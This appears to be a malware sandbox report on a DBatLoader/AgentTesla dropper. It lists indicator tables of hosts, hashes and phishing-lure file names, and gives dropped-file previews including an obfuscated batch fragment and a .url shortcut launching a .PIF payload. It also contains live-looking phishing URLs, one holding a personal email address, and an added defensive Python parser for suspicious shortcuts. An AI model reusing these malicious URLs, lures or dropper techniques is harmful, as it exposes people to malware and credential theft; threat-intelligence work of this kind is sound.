104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | RDPWrap Tool | api.ipify.org/
104.26.13.205 | Prismifyr-Install.exe | malicious | Node Stealer | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, PrivateLoader, Stealc, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Vidar | api.ipify.org/
104.26.13.205 | file.exe | malicious | Unknown | api.ipify.org/
104.26.13.205 | file.exe | malicious | LummaC, RDPWrap Tool, LummaC Stealer, Stealc, Vidar | api.ipify.org/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
s82.gocheapweb.com | neworigin.exe | malicious | AgentTesla | 51.195.88.199
s82.gocheapweb.com | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader | 51.195.88.199
s82.gocheapweb.com | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat | malicious | AgentTesla, DBatLoader | 51.195.88.199
s82.gocheapweb.com | New_Order_PO_GM5637H93.exe | malicious | AgentTesla, PureLog Stealer, RedLine, XWorm | 51.195.88.199
s82.gocheapweb.com | New_Order_PO_GM5637H93.cmd | malicious | AgentTesla, DBatLoader | 51.195.88.199
s82.gocheapweb.com | AENiBH7X1q.exe | malicious | PureLog Stealer, RedLine | 51.195.88.199
s82.gocheapweb.com | New_Order_568330_Material_Specifications.exe | malicious | AgentTesla, MassLogger RAT, Phoenix Stealer, RedLine, SugarDump, XWorm | 51.195.88.199
s82.gocheapweb.com | RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exe | malicious | PureLog Stealer, RedLine | 51.195.88.199
s82.gocheapweb.com | PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exe | malicious | PureLog Stealer, RedLine | 51.195.88.199
s82.gocheapweb.com | PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exe | malicious | PureLog Stealer, RedLine | 51.195.88.199
api.ipify.org | neworigin.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader | 104.26.13.205
api.ipify.org | Booking_0731520.vbe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | Purchase order.exe | malicious | AgentTesla | 104.26.12.205
api.ipify.org | https://www.canva.com/design/DAGV5ZsI2aM/Y4DbzinsvfGp5Ll4c_oJJQ/view?utm_content=DAGV5ZsI2aM&utm_campaign=designshare&utm_medium=link&utm_source=editor | malicious | Unknown | 104.26.13.205
api.ipify.org | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat | malicious | AgentTesla, DBatLoader | 104.26.12.205
api.ipify.org | Swift Copy.bat.exe | malicious | AgentTesla, GuLoader | 104.26.13.205
api.ipify.org | Pago por adelantado_ USD 72000 (50%).exe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | SWIFTCOPY202973783.vbe | malicious | AgentTesla | 104.26.13.205
api.ipify.org | Quotation.exe | malicious | AgentTesla, GuLoader | 172.67.74.152
gxe0.com | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader | 198.252.105.91
gxe0.com | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat | malicious | AgentTesla, DBatLoader | 198.252.105.91
gxe0.com | NEOMS_EOI_FORM.cmd | malicious | DBatLoader | 198.252.105.91
gxe0.com | NEOMS_EOI_FORM.GZ | malicious | DBatLoader |
                                                                                        • 198.252.105.91
                                                                                        New_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 198.252.105.91
                                                                                        pywolwnvd.bizTC_Ziraat_Bankasi_Hesap_Ekstresi.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 54.244.188.177
                                                                                        Ziraat_Bankasi_Swift_Mesaji_DXB04958T.batGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                        • 54.244.188.177
                                                                                        AENiBH7X1q.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 54.244.188.177
                                                                                        E_dekont.cmdGet hashmaliciousDBatLoader, Nitol, PureLog Stealer, XWormBrowse
                                                                                        • 54.244.188.177
                                                                                        Y2EM7suNV5.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 54.244.188.177
                                                                                        AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • 54.244.188.177
                                                                                        SetupRST.exeGet hashmaliciousUnknownBrowse
                                                                                        • 54.244.188.177
                                                                                        AsusSetup.exeGet hashmaliciousUnknownBrowse
                                                                                        • 54.244.188.177
                                                                                        RFQ_PO-GGA7765JK09_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 54.244.188.177
                                                                                        PO-DGA77_MATERIALS_SPECIFICATIONS.scr.exeGet hashmaliciousPureLog Stealer, RedLineBrowse
                                                                                        • 54.244.188.177
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HAWKHOSTCA | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader | 198.252.105.91
HAWKHOSTCA | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat | malicious | AgentTesla, DBatLoader | 198.252.105.91
HAWKHOSTCA | NEOMS_EOI_FORM.cmd | malicious | DBatLoader | 198.252.105.91
HAWKHOSTCA | NEOMS_EOI_FORM.GZ | malicious | DBatLoader | 198.252.105.91
HAWKHOSTCA | New_Order_PO_GM5637H93.cmd | malicious | AgentTesla, DBatLoader | 198.252.105.91
HAWKHOSTCA | Shipping documents..exe | malicious | FormBook | 198.252.98.54
HAWKHOSTCA | SALARY OF OCT 2024.exe | malicious | FormBook | 198.252.98.54
HAWKHOSTCA | PURCHASE ORDER-6350.exe | malicious | FormBook | 198.252.106.191
HAWKHOSTCA | https://hy.markkasmick.click/cx/tbSgVco_akr35UznLBgMmL_dGwr4A9B_vyg2WwEB0w1LRjKjQMyEnB89mCfTRy8oqnbpdFunqinBhx0TsHvSJdUHnbksc3kdcKecoDvVHa5LAm46at*Mm*Ro3D2CHoEu2bmOqt4Ic8O_7AE7Igwgbi5c8zmZf6Fqp*_XqcjREPr7609oL7vKm8FfjGLhMetr2oxtpR3ywH4BUElgc7EI7usxj8CJYEUMktwlb7YUzPvYQ7P1PilEV0LqiXI5sm6QVF4ZGl5TIXhnQLOG0kl6WQ0miiZysBfhaNojnPTUvisUUkwOp2fYTxkXEIhZ7ESJ7qXYLxQbm*y4RJVeZZZ3RY5rX8W5t8cudSM9Zx7UaxgLH56aOv81v4QfUnzroT9v*7LR3jPEjz*YXr2LwuykYQnzvV6boWl*o*gU4jkPE6MocRRlRoC6uUx2e1Wseo8MqGWTT2uXo4HbQDneiMF84sQ34*3TnbAxXWu8xLbb_mAOQxUTA3T5TUUZKeU3ziolM8TSVV5Y5LQTFGtNArddwJKdWCb_cLYMxUJpZ3cqM_A | malicious | Unknown | 198.252.106.147
HAWKHOSTCA | Z6s208B9QX.exe | malicious | FormBook | 198.252.106.191
CLOUDFLARENETUS | neworigin.exe | malicious | AgentTesla | 104.26.12.205
CLOUDFLARENETUS | https://sites.google.com/worth.com/rfp/home | malicious | Unknown | 188.114.96.3
CLOUDFLARENETUS | https://account-service.fr/PSTPNL/postal1 | malicious | Unknown | 104.21.95.157
CLOUDFLARENETUS | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader | 104.26.13.205
CLOUDFLARENETUS | https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.ca | malicious | Captcha Phish | 104.26.5.39
CLOUDFLARENETUS | https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.ca | malicious | Captcha Phish | 172.67.72.174
CLOUDFLARENETUS | E7X-XIZ5.eml | malicious | Unknown | 104.18.95.41
CLOUDFLARENETUS | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | 188.114.97.3
CLOUDFLARENETUS | http://track.reviewmgr.com/ls/click?upn=u001.W5y-2Fhe84rCuLxXDO470nfuKD2Iz98QeQpE-2BkxRR0H-2BqB5cDKklujIJ5FLru7QrAASOSa17vR-2FSCLVAx4lWyy5Q-3D-3DkaP7_Yp4ydSxZWNatis3HtI6bBrJjg57JYwT6kbyY2f89Z-2FBhxNJZyCBl9w6yXNV0YfiKUAGjaILaAN0mF43Ydvv3aAXjCPBMrYvHXhqj-2F90M8IWSluK-2FDr0h4-2FIbAXpExZIWOjtRSKBCrpvm-2BHKZd6Q2itOPvvv8Wh8uHJq1rbQgzA8HMkQB3GP7mtgLvWqf-2F2SUC5eKSSwLqPZnnofRHoc7cSU1xfupfl4il6cb3-2BSKrTYe1odI0Jq1F3XJEtoagDhZ-2B0poPJjuweCyekPO2Y39xfy8FdwLLvVUma4NgVhDhlM-3D | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://t.ly/SjDNX | malicious | Python Stealer, Braodo | 162.159.61.3
OVHFR | neworigin.exe | malicious | AgentTesla | 51.195.88.199
OVHFR | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader | 51.195.88.199
OVHFR | https://sharepoint-business.com/?rid=eprRhgr | malicious | Unknown | 51.178.43.144
OVHFR | http://matomo.uk.oxa.cloud | malicious | Unknown | 51.195.180.103
OVHFR | zgp.elf | malicious | Mirai | 51.222.237.206
OVHFR | mNtu4X8ZyE.exe | malicious | Emotet | 51.75.33.127
OVHFR | 75A0VTo3z9.exe | malicious | Emotet | 46.105.114.137
OVHFR | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat | malicious | AgentTesla, DBatLoader | 51.195.88.199
OVHFR | https://klick.publikator.se/?BREV_ID=592&EPOST=kent.isaksson@platspecialisten.se&URL=https://link.mail.tailwindapp.com/c/443/65791c056ee100f6e0b1ce0da6ffd5aaa4304af6d9041064814b00b317faceea | malicious | HTMLPhisher | 192.99.218.232
OVHFR | RFQ_TFS-1508-AL NASR userING.exe | malicious | RedLine | 193.70.111.186
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | neworigin.exe | malicious | AgentTesla | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | https://webconference.protected-forms.com/XaGFyNXNiVFNRd1VaOFBwaER2WW5KM1V1S1NLSzZZZDhjN3NKVC9oV2lCRlNRWmVpbVlYY0JzbS81VUd0czRzOHNRWWNGSndpSCtxMm15d3h6SnFIS0VpR2NHcHh2MWo5Nm1wM3lROHdlakpZdnVWYUpHZDJ2LzVyV1ljWjZuK2pHcTByTjRWRm1IRnpPSnVmUFI0TVk2dHN5L1Yxdko0Y01WeHZYck1iM2tvc3l4YVdqSlZabWl2Y0ZwLzQtLVZvU05jS1M1U0FEQjZZeHUtLUw3WXM4dkFWa2t2YTRLMXJEYTRIbGc9PQ==?cid=2270944670 | malicious | KnowBe4 | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | HvOPtSE7cm.dll | malicious | ElizaRAT | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | 9LrEuTWP8s.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | HAeAec7no3.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | EUFOvMxM2H.exe | malicious | Meduza Stealer, PureLog Stealer, RedLine, zgRAT | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | https://customization-connect-7617.my.salesforce.com/sfc/p/d3000000Byor/a/d300000000RR/ML8ajzoJU6aJIvGQZGZ6S9rRHpaD1XaytKzcNGEf56g | malicious | HTMLPhisher | 104.26.13.205
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Amadey, Stealc, Vidar | 104.26.13.205
a0e9f5d64349fb13191bc781f81f42e1 | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | Booking_0731520.vbe | malicious | AgentTesla | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, Stealc, Vidar | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | Payment advice_USD75,230.18.xls | malicious | Unknown | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | Scan12112024,pdf.vbs | malicious | Snake Keylogger, VIP Keylogger | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Stealc, Vidar | 198.252.105.91
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC, Stealc, Vidar | 198.252.105.91
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Users\Public\Libraries\lxsyrsiW.pif | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader |
C:\Users\Public\Libraries\lxsyrsiW.pif | Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat | malicious | AgentTesla, DBatLoader |
C:\Users\Public\Libraries\lxsyrsiW.pif | NEOMS_EOI_FORM.cmd | malicious | DBatLoader |
C:\Users\Public\Libraries\lxsyrsiW.pif | NEOMS_EOI_FORM.GZ | malicious | DBatLoader |
C:\Users\Public\Libraries\lxsyrsiW.pif | r876789878767.cmd | malicious | DBatLoader, FormBook |
C:\Users\Public\Libraries\lxsyrsiW.pif | 2tKeEoCCCw.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger |
C:\Users\Public\Libraries\lxsyrsiW.pif | New_Order_PO_GM5637H93.cmd | malicious | AgentTesla, DBatLoader |
C:\Users\Public\Libraries\lxsyrsiW.pif | E_dekont.cmd | malicious | DBatLoader, Nitol, PureLog Stealer, XWorm |
C:\Users\Public\Libraries\lxsyrsiW.pif | z1Transaction_ID_REF2418_cmd.bat | malicious | AgentTesla, DBatLoader, PureLog Stealer |
C:\Users\Public\Libraries\lxsyrsiW.pif | z1SWIFT_MT103_Payment_552016_cmd.bat | malicious | DBatLoader, FormBook |
C:\Users\Public\Libraries\Wisrysxl.PIF | TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd | malicious | AgentTesla, DBatLoader |
                                                                                                              Process:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1290240
                                                                                                              Entropy (8bit):5.27777578746112
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:12288:mImGUcsvZZdubv7hfl3WXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wlb:mxGBcmlmsqjnhMgeiCl7G0nehbGZpbD
                                                                                                              MD5:53AD440DF43FFC879E3B05A7B0B31B23
                                                                                                              SHA1:5D5549FE850ADC0ACDB3B141D0DD2D8C0B38C8DC
                                                                                                              SHA-256:BA6CA839AA57FA9AF7C09F20A9DB215EED99A15E2A73C5AB231060F1676C75E9
                                                                                                              SHA-512:2FECBD193E36F5E718579E51091887628364BC9A341DDAEA4E3460702BC66EA0686C22D22E5541C3A892F917D3D32E50B31226FCA99D93CD8CDA8C726F6841F7
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: Avira, Detection: 100%
                                                                                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........]...3...3...3...0...3...6.h.3.,.7...3.,.0...3.,.6...3...7...3...2...3...2.G.3.e.:...3.e....3.....3.e.1...3.Rich..3.................PE..L...}..d..........................................@..................................#......................................`D......................................@...p...........................p...@....................B.......................text.............................. ..`.rdata..t...........................@..@.data........`.......@..............@....didat..4............N..............@....rsrc................P..............@..@.reloc...`.......P...`..............@...........................................................................................................................................................................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):4
                                                                                                              Entropy (8bit):2.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:X:X
                                                                                                              MD5:D268EDBA3F2644172D611AA9BC7A43A9
                                                                                                              SHA1:8B9A0675D33DC05DB3943960D5B1438970B6E591
                                                                                                              SHA-256:E603E189A414673BC741DF635271CD1B1EF25D8E3A1131DD0E847B632BBD4869
                                                                                                              SHA-512:48D46515E5CD50B0FC80EBB8437F61CC9FA5FE3102597B0CDC9653D363D71B639FA896A00286DEBBDEC19A7C8A27A66BA7E7B54C73563BB089D9A0BE4D9ACE30
                                                                                                              Malicious:false
                                                                                                              Preview:45..
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1921890
                                                                                                              Entropy (8bit):7.398856770638502
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:49152:uFLsbSRbR4KUHq/dhv95pz9P8/P/lUtAQXI53D7/vwpU19uyXABAtIFBlZ:ULhRGYHKOBlZ
                                                                                                              MD5:34E82F30B12F324DB1D2604CFA91CBB2
                                                                                                              SHA1:20001D49CD86B776EE8072A07F536B7330A77F97
                                                                                                              SHA-256:F1821B6BA4856A51354BEED61C0F325D39901D70F9FF1792A63758FFEA32FCEF
                                                                                                              SHA-512:47ADC8F19359C4DC9E073C7A464E3F5F0367AC6A06BB6AA741AA06FE8BD762ADB86304415623FB411E69CACC573E66E6397689C47B7291747E057E5BF001C1C1
                                                                                                              Malicious:true
                                                                                                              Preview:...Y#..K..&$..'.#'...%.... %" ...... ..&.....&..$"%.#$'#....'...... '%.%!... .%.''"". "#".%..&.&........%........."!...#'....Y#..K.. .& %.. ...Y#..K.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j.........P.O..."..../....8....\..%.
                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1081856
                                                                                                              Entropy (8bit):6.9272903664814445
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24576:BJSK4Kavab3wMeAOr6ZFlR+gKT44VoIOL7zk:7K1WYL6L
                                                                                                              MD5:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                              SHA1:97340CA203A1207E492135D580C6860A724A227F
                                                                                                              SHA-256:F711703C8BA66DCEDB8E4B83F21A0425C528E278242C852FD5CF54BB43E30454
                                                                                                              SHA-512:6C217FA37CC4C655CDA0A2A491E49AC736E4940027178B3C7D6488D296923D40CC26A4D0142052B94B58491FA90F17AB3F4115CB0C75EFE09175E732D62DBBF5
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 29%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................0...N......\G.......P....@.......................... ...................@..............................6%..............................0r..................................................................................text....&.......(.................. ..`.itext.......@.......,.............. ..`.data........P.......4..............@....bss.....6...p.......R...................idata..6%.......&...R..............@....tls....4............x...................rdata...............x..............@..@.reloc..0r.......t...z..............@..B.rsrc...............................@..@............. ......................@..@................................................................................................
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (324), with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):62357
                                                                                                              Entropy (8bit):4.705712327109906
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:768:KwVRHlxGSbE0l9swi54HlMhhAKHwT6yQZPtQdtyWNd/Ozc:LbeSI0l9swahhhtwT6VytHNdGzc
                                                                                                              MD5:B87F096CBC25570329E2BB59FEE57580
                                                                                                              SHA1:D281D1BF37B4FB46F90973AFC65EECE3908532B2
                                                                                                              SHA-256:D08CCC9B1E3ACC205FE754BAD8416964E9711815E9CEED5E6AF73D8E9035EC9E
                                                                                                              SHA-512:72901ADDE38F50CF6D74743C0A546C0FEA8B1CD4A18449048A0758A7593A176FC33AAD1EBFD955775EEFC2B30532BCC18E4F2964B3731B668DD87D94405951F7
                                                                                                              Malicious:false
                                                                                                              Preview:@echo off..@echo off..@%.......%e%..%c%...%h%.... ...%o%........% %.%o%.....%f%...%f% ........%..s%.%e%.... %t%r.o......% %....%"%.........%l%.......o.%V%......%W%.....o%a%..........%=%.o....%s%. .o%e%. ....... %t%.% %..%"%.r%..%lVWa%"%......%u%. .%p%.%w%.... %u%.... o...%=%..... %=%... . . %"%.%..%lVWa%"%....%R%.%b%. .... %U%. %p%.%z%...%n% ...%n%...%f%..... . ..%W%.......%i%......%%upwu%C%. .. %l%...%o%........%a%......%"% .... %..%lVWa%"% %r%......%M%....%S%...r... ..%o%....... .%w%.....%X%.....rr%I%..... .
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):68096
                                                                                                              Entropy (8bit):6.328046551801531
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:lR2rJpByeL+39Ua1ITgA8wpuO5CU4GGMGcT4idU:lR2lg9Ua1egkCU60U
                                                                                                              MD5:C116D3604CEAFE7057D77FF27552C215
                                                                                                              SHA1:452B14432FB5758B46F2897AECCD89F7C82A727D
                                                                                                              SHA-256:7BCDC2E607ABC65EF93AFD009C3048970D9E8D1C2A18FC571562396B13EBB301
                                                                                                              SHA-512:9202A00EEAF4C5BE94DE32FD41BFEA40FC32D368955D49B7BAD2B5C23C4EBC92DCCB37D99F5A14E53AD674B63F1BAA6EFB1FEB27225C86693EAD3262A26D66C6
                                                                                                              Malicious:true
                                                                                                              Antivirus:
                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                              Joe Sandbox View:
                                                                                                              • Filename: TC_Ziraat_Bankasi_Hesap_Ekstresi.cmd, Detection: malicious
                                                                                                              • Filename: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.bat, Detection: malicious
                                                                                                              • Filename: NEOMS_EOI_FORM.cmd, Detection: malicious
                                                                                                              • Filename: NEOMS_EOI_FORM.GZ, Detection: malicious
                                                                                                              • Filename: r876789878767.cmd, Detection: malicious
                                                                                                              • Filename: 2tKeEoCCCw.exe, Detection: malicious
                                                                                                              • Filename: New_Order_PO_GM5637H93.cmd, Detection: malicious
                                                                                                              • Filename: E_dekont.cmd, Detection: malicious
                                                                                                              • Filename: z1Transaction_ID_REF2418_cmd.bat, Detection: malicious
                                                                                                              • Filename: z1SWIFT_MT103_Payment_552016_cmd.bat, Detection: malicious
                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................................................................................................................................................................................................................................................................................PE..L....8.......................p....................@.............................................. ...................p.......`...............................................................P.......................................................text............................... ..`.data....p.......0..................@....tls.........@......................@....rdata.......P......................@..P.idata.......`......................@..@.edata.......p......................@..@
                                                                                                              Process:C:\Users\user\Desktop\x.exe
                                                                                                              File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF">), ASCII text, with CRLF line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):104
                                                                                                              Entropy (8bit):5.094576921115185
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XM6tZsbxH+95ov:HRYFVmTWDyzPtZEx22v
                                                                                                              MD5:E2B7BE259ACDD6088895958CAB9567B8
                                                                                                              SHA1:BACD585BD1D363629B1B8C10285711313D1D51E5
                                                                                                              SHA-256:1EC3D3D43F061F2E990D0B59F4B8F798C90D81F30F5B5363FE2F6B88386F1DB9
                                                                                                              SHA-512:A54A88368C805B997E266C8EA4C7417B0AAC30A0A5A0E7FF4885009F490FCC4D982554CFF5205F8F1D140D6260D3D346380199128AEF3F0239C1F193CF3F1316
                                                                                                              Malicious:true
                                                                                                              Preview:[InternetShortcut]..URL=file:"C:\\Users\\Public\\Libraries\\Wisrysxl.PIF"..IconIndex=957720..HotKey=80..
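The entry above is a plain .url (InternetShortcut) file whose target is not a web address but a file: URL naming C:\Users\Public\Libraries\Wisrysxl.PIF. The Windows shell treats .PIF as an executable extension, so opening the shortcut runs that file; and the process name lxsyrsiW.pif, which appears further down this listing as the dropper of the .NET assembly, is the same name spelled backwards. Where the shortcut itself was written is not shown in this section. The following parser is an added example of mine, not part of the Joe Sandbox report: it reads a .url file, resolves a file: URL to a Windows path, and flags executable targets, world-writable staging directories and a set HotKey. The sample is reconstructed from the preview above with the dots restored to CRLF; whether the doubled backslashes are in the file on disk or are the report's escaping cannot be determined from the listing, so the parser normalises both forms. Helper names and the directory list are assumptions.

```python
"""Triage a Windows .url (InternetShortcut) file whose URL= is a local file: target.

Added example, not part of the sandbox report.  Function names, the extension
set and the staging-directory list are my own choices.
"""
import re
from pathlib import PureWindowsPath
from urllib.parse import unquote

# Extensions the Windows shell executes directly when a shortcut points at them.
EXECUTABLE_EXTS = {".pif", ".exe", ".com", ".scr", ".bat", ".cmd", ".vbs", ".js", ".hta", ".lnk"}
# Directories any local user can write to; a shortcut target living there is a red flag.
PUBLIC_DROP_DIRS = ("c:\\users\\public\\", "c:\\programdata\\", "\\appdata\\local\\temp\\")

# Constructed sample: the preview from the report with CRLF restored.  The doubled
# backslashes are kept exactly as the preview shows them.
SAMPLE = (
    "[InternetShortcut]\r\n"
    'URL=file:"C:\\\\Users\\\\Public\\\\Libraries\\\\Wisrysxl.PIF"\r\n'
    "IconIndex=957720\r\n"
    "HotKey=80\r\n"
)


def parse_url_shortcut(text):
    """Return the key/value pairs of the [InternetShortcut] section, keys lower-cased."""
    section, fields = None, {}
    for raw in text.splitlines():
        line = raw.strip().lstrip("\ufeff")          # tolerate a UTF-8 BOM on the first line
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    if "url" not in fields:
        raise ValueError("no URL= line inside [InternetShortcut]")
    return fields


def local_target(url):
    """Windows path a file: URL points at, or None when the scheme is not file:."""
    m = re.match(r'(?i)^file:(?://)?"?(.*?)"?$', url.strip())
    if not m:
        return None
    path = unquote(m.group(1))
    path = path.replace("\\\\", "\\").replace("/", "\\")  # un-double backslashes, unify slashes
    return re.sub(r"^\\+(?=[A-Za-z]:)", "", path)        # file:///C:/x -> C:\x


def reversed_stem(target):
    """Base name spelled backwards, to search for the mirrored file name."""
    return PureWindowsPath(target).stem[::-1]


def assess(text):
    """Parse a .url file and list why it is suspicious (empty list = nothing flagged)."""
    fields = parse_url_shortcut(text)
    target = local_target(fields["url"])
    findings = []
    if target is None:
        return {"url": fields["url"], "target": None, "findings": findings}
    suffix = PureWindowsPath(target).suffix.lower()
    if suffix in EXECUTABLE_EXTS:
        findings.append("file: URL launches an executable (%s)" % suffix)
    if any(d in target.lower() for d in PUBLIC_DROP_DIRS):
        findings.append("target lives in a world-writable staging directory")
    if fields.get("hotkey", "0") not in ("", "0"):
        findings.append("HotKey set: shortcut can be triggered from the keyboard")
    return {"url": fields["url"], "target": target, "findings": findings}


if __name__ == "__main__":
    result = assess(SAMPLE)
    print(result["target"], "->", reversed_stem(result["target"]))
    for f in result["findings"]:
        print(" -", f)
```

Run on the sample, assess() resolves the target to C:\Users\Public\Libraries\Wisrysxl.PIF and returns three findings; reversed_stem() gives lxsyrsiW, the process name seen later in this listing. Feeding the same function a directory of collected .url files (Startup folders, Desktop, Public) is a cheap way to surface file: shortcuts that point at executables outside Program Files.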
                                                                                                              Process:C:\Windows\SysWOW64\esentutl.exe
                                                                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                              Category:dropped
                                                                                                              Size (bytes):236544
                                                                                                              Entropy (8bit):6.4416694948877025
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:i4VU52dn+OAdUV0RzCcXkThYrK9qqUtmtime:i4K2B+Ob2h0NXIn
                                                                                                              MD5:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                              SHA1:4048488DE6BA4BFEF9EDF103755519F1F762668F
                                                                                                              SHA-256:4D89FC34D5F0F9BABD022271C585A9477BF41E834E46B991DEAA0530FDB25E22
